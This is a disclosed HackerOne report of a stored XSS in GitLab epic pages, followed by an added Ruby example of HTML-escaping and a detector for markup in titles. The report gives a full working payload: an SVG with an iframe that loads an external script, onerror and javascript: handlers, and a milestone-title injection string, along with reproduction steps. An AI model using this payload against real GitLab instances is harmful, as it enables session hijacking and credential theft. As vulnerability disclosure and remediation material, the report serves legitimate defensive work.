Stored XSS in epic's pages

HackerOne report #1055814 by mike12 on 2020-12-10, assigned to @rchan-gitlab:

Report

Hi GitLab!

It's possible to inject arbitrary JS code into an epic's page using the Start date and Due date.

This XSS works for:

  1. gitlab.com using Firefox (tested in Firefox 83.0)
  2. A self-hosted GitLab instance without CSP using Safari (tested in Safari 13.1), Chrome (tested in Chrome 87.0.4280.88) or Firefox

Steps to reproduce using Firefox

  1. Open your browser and navigate to https://gitlab.com

  2. Create a group and a project in it

  3. Add a file named demo.svg to the project with the following content:

    <svg id="x"
         xmlns="http://www.w3.org/2000/svg"
         width="100"
         height="100"
    >
        <foreignObject>
            <iframe xmlns="http://www.w3.org/1999/xhtml"
                    srcdoc='<script src=https://gitlab.com/mike12-h1/csp/-/raw/master/index.js> </script>'></iframe>
        </foreignObject>

        <image href="foo" onerror="alert('onerror')"/>

        <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert('xlink:href')">
            <circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red"/>
            <text x="50%" y="50%" text-anchor="middle" stroke="#000000" stroke-width="1px" dy=".3em">Click me</text>
        </a>
    </svg>

  4. Create a new epic in the group

  5. Create a new issue in the project

  6. Assign the created epic to the issue

  7. Create a new milestone in the project

    1. Title: <svg width="100"><use xlink:href="/<YOUR-GROUP-NAME>/<YOUR-PROJECT>/-/raw/master/demo.svg#x" /></svg> (Replace <YOUR-GROUP-NAME> and <YOUR-PROJECT> with your values)
    2. Specify any valid Start Date and Due Date values

  8. Assign the created milestone to the issue

  9. Navigate to the epic created in step 4

  10. Hover your mouse over the inherited due date

1.png

Steps to reproduce using Safari

  1. Run a self-hosted GitLab instance
  2. Repeat steps 2 through 10 from the "Steps to reproduce using Firefox" section.

Steps to reproduce using Chrome

  1. Run a self-hosted GitLab instance
  2. Repeat steps 2 through 10 from the "Steps to reproduce using Firefox" section.
  3. Click the red circle in the due date tooltip.

2.png

3.png

Impact

An attacker can:

  1. Perform any action within the application that a user can perform
  2. Steal sensitive user data, including credentials
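
As an added illustration (not code from the report or from GitLab; the helper names and the tooltip markup are assumptions standing in for the real rendering path), the Ruby below contrasts interpolating a milestone title into the inherited due date tooltip unescaped with HTML-escaping it, and adds an audit helper for finding stored titles that already carry markup, since a stored payload outlives the rendering fix. The step-7 title is used as constructed input with a placeholder group/project path.

```ruby
require 'erb'

# Constructed inputs: the milestone title from step 7 (placeholder path) and a
# benign title that legitimately contains a '<' character.
MALICIOUS_TITLE = '<svg width="100"><use xlink:href="/GROUP/PROJECT/-/raw/master/demo.svg#x" /></svg>'
BENIGN_TITLE    = 'Sprint 12: keep latency a < b'

# Assumed vulnerable pattern: the tooltip is built by string interpolation, so
# any tags inside the stored title become live markup when the tooltip opens.
def tooltip_html_unsafe(title, due_date)
  "<span class=\"due-date\">#{due_date} (inherited from milestone #{title})</span>"
end

# Hardened version: every user-controlled value is HTML-escaped before it is
# placed in the markup, so the title is displayed literally.
def tooltip_html_safe(title, due_date)
  "<span class=\"due-date\">#{ERB::Util.html_escape(due_date)} " \
    "(inherited from milestone #{ERB::Util.html_escape(title)})</span>"
end

# Rendering check: true when the produced HTML contains any element other
# than the wrapper <span>, i.e. the title managed to inject elements.
def injects_elements?(html)
  tags = html.scan(/<\/?([a-zA-Z][\w:-]*)/).flatten.map(&:downcase).uniq
  tags != ['span']
end

# Post-fix data audit: flags stored titles that contain a tag or a
# javascript: URL so they can be reviewed and cleaned after the patch.
def markup_in_title?(title)
  !!(title =~ /<\s*[a-zA-Z][^>]*>/i) || title.downcase.include?('javascript:')
end

if __FILE__ == $0
  puts tooltip_html_unsafe(MALICIOUS_TITLE, '2020-12-31')
  puts tooltip_html_safe(MALICIOUS_TITLE, '2020-12-31')
  puts markup_in_title?(MALICIOUS_TITLE)
end
```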

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: